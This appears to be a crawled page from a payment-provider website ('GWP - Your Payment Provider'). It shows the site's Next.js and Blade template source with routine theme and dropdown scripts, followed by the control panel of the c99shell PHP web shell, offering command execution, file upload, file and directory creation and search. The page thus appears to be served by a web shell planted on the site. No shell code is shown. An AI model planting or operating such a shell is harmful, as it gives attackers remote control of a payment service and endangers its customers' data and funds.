            "0:[\"$\",\"$L2\",null,{\"buildId\":\"dv7Y1oQns51ZYK1704kew\",\"assetPrefix\":\"\",\"urlParts\":[\"\",\"\"],\"initialTree\":[\"\",{\"children\":[\"__PAGE__\",{}]},\"$undefined\",\"$undefined\",true],\"initialSeedData\":[\"\",{\"children\":[\"__PAGE__\",{},[[\"$L3\",[\"$\",\"$L4\",null,{\"props\":{\"params\":{},\"searchParams\":{}},\"Component\":\"$5\"}],null],null],null]},[[[[\"$\",\"link\",\"0\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/a908a227fb3cc0b6.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\"}]],[\"$\",\"html\",null,{\"lang\":\"en\",\"children\":[\"$\",\"body\",null,{\"children\":[\"$\",\"$L6\",null,{\"attribute\":\"class\",\"storageKey\":\"theme\",\"defaultTheme\":\"system\",\"disableTransitionOnChange\":true,\"children\":[\"$\",\"$L7\",null,{\"parallelRouterKey\":\"children\",\"segmentPath\":[\"children\"],\"error\":\"$undefined\",\"errorStyles\":\"$undefined\",\"errorScripts\":\"$undefined\",\"template\":[\"$\",\"$L8\",null,{}],\"templateStyles\":\"$undefined\",\"templateScripts\":\"$undefined\",\"notFound\":[[\"$\",\"title\",null,{\"children\":\"404: This page could not be found.\"}],[\"$\",\"div\",null,{\"style\":{\"fontFamily\":\"system-ui,\\\"Segoe UI\\\",Roboto,Helvetica,Arial,sans-serif,\\\"Apple Color Emoji\\\",\\\"Segoe UI Emoji\\\"\",\"height\":\"100vh\",\"textAlign\":\"center\",\"display\":\"flex\",\"flexDirection\":\"column\",\"alignItems\":\"center\",\"justifyContent\":\"center\"},\"children\":[\"$\",\"div\",null,{\"children\":[[\"$\",\"style\",null,{\"dangerouslySetInnerHTML\":{\"__html\":\"body{color:#000;background:#fff;margin:0}.next-error-h1{border-right:1px solid rgba(0,0,0,.3)}@media (prefers-color-scheme:dark){body{color:#fff;background:#000}.next-error-h1{border-right:1px solid rgba(255,255,255,.3)}}\"}}],[\"$\",\"h1\",null,{\"className\":\"next-error-h1\",\"style\":{\"display\":\"inline-block\",\"margin\":\"0 20px 0 0\",\"padding\":\"0 23px 0 0\",\"fontSize\":24,\"fontWeight\":500,\"verticalAlign\":\"top\",\"lineHeight\":\"49px\"},\"children\":\"404\"}],[\"$\",\"div\",null,{\"style\":{\"display\":\"inline-block\"},\"children\":[\"$\",\"h2\",null,{\"style\":{\"fontSize\":14,\"fontWeight\":400,\"lineHeight\":\"49px\",\"margin\":0},\"children\":\"This page could not be found.\"}]}]]}]}]],\"notFoundStyles\":[]}]}]}]}]],null],null],\"couldBeIntercepted\":false,\"initialHead\":[null,\"$L9\"],\"globalErrorComponent\":\"$a\",\"missingSlots\":\"$Wb\"}]\n"
        ])
    </script>
    <script>
        self.__next_f.push([1,
            "9:[[\"$\",\"meta\",\"0\",{\"name\":\"viewport\",\"content\":\"width=device-width, initial-scale=1\"}],[\"$\",\"meta\",\"1\",{\"charSet\":\"utf-8\"}],[\"$\",\"title\",\"2\",{\"children\":\"GWP - Your Payment Provider\"}],[\"$\",\"link\",\"3\",{\"rel\":\"icon\",\"href\":\"/favicon.ico\"}]]\n3:null\n"
        ])
    </script>
    <script>
        const themeToggleBtn = document.getElementById('theme-toggle');
        const htmlElement = document.documentElement;
        const sunIcon = document.getElementById('sun-icon');
        const moonIcon = document.getElementById('moon-icon');

        // Initialize theme
        const savedTheme = localStorage.getItem('theme');
        if (savedTheme === 'dark' || (!savedTheme && window.matchMedia('(prefers-color-scheme: dark)').matches)) {
            htmlElement.classList.add('dark');
            sunIcon.classList.add('hidden');
            moonIcon.classList.remove('hidden');
        } else {
            htmlElement.classList.remove('dark');
            sunIcon.classList.remove('hidden');
            moonIcon.classList.add('hidden');
        }

        // Toggle theme on click
        themeToggleBtn.addEventListener('click', () => {
            htmlElement.classList.toggle('dark');
            const isDark = htmlElement.classList.contains('dark');

            if (isDark) {
                localStorage.setItem('theme', 'dark');
                sunIcon.classList.add('hidden');
                moonIcon.classList.remove('hidden');
            } else {
                localStorage.setItem('theme', 'light');
                sunIcon.classList.remove('hidden');
                moonIcon.classList.add('hidden');
            }
        });
    </script>
    <script>
        const button = document.getElementById('dropdownButton');
        const menu = document.getElementById('dropdownMenu');

        button.addEventListener('click', () => {
            menu.classList.toggle('hidden');
        });

        // Optional: Close dropdown when clicking outside
        document.addEventListener('click', (e) => {
            if (!button.contains(e.target) && !menu.contains(e.target)) {
                menu.classList.add('hidden');
            }
        });
    </script>
    <script>
        document.addEventListener("DOMContentLoaded", function() {
            const menuToggle = document.getElementById("mobile-menu-toggle");
            const mobileMenu = document.getElementById("mobile-menu");

            menuToggle.addEventListener("click", function() {
                mobileMenu.classList.toggle("opacity-0");
                mobileMenu.classList.toggle("pointer-events-none");
            });
        });
    </script>
    <script>
        document.addEventListener("DOMContentLoaded", () => {
            function setupDropdown(buttonId, menuId, chevronId = null) {
                const button = document.getElementById(buttonId);
                const menu = document.getElementById(menuId);
                const chevron = chevronId ? document.getElementById(chevronId) : null;

                button.addEventListener("click", () => {
                    menu.classList.toggle("hidden");
                    if (chevron) {
                        chevron.classList.toggle("rotate-180"); // rotate arrow
                    }
                });

                // Close if clicked outside
                document.addEventListener("click", (e) => {
                    if (!button.contains(e.target) && !menu.contains(e.target)) {
                        menu.classList.add("hidden");
                        if (chevron) chevron.classList.remove("rotate-180");
                    }
                });
            }

            // Setup all dropdowns
            setupDropdown("loginDropdownBtn", "loginDropdown");
            setupDropdown("loginDropdownHomeBtn", "loginDropdownHome");
            setupDropdown("signupDropdownBtn", "signupDropdown");
            setupDropdown("signupDropdownHomeBtn", "signupDropdownHome");
            setupDropdown("serviceDropdownBtn", "serviceDropdown", "serviceChevron");
        });
    </script>

    @yield('js')
</body>

</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0052 ]--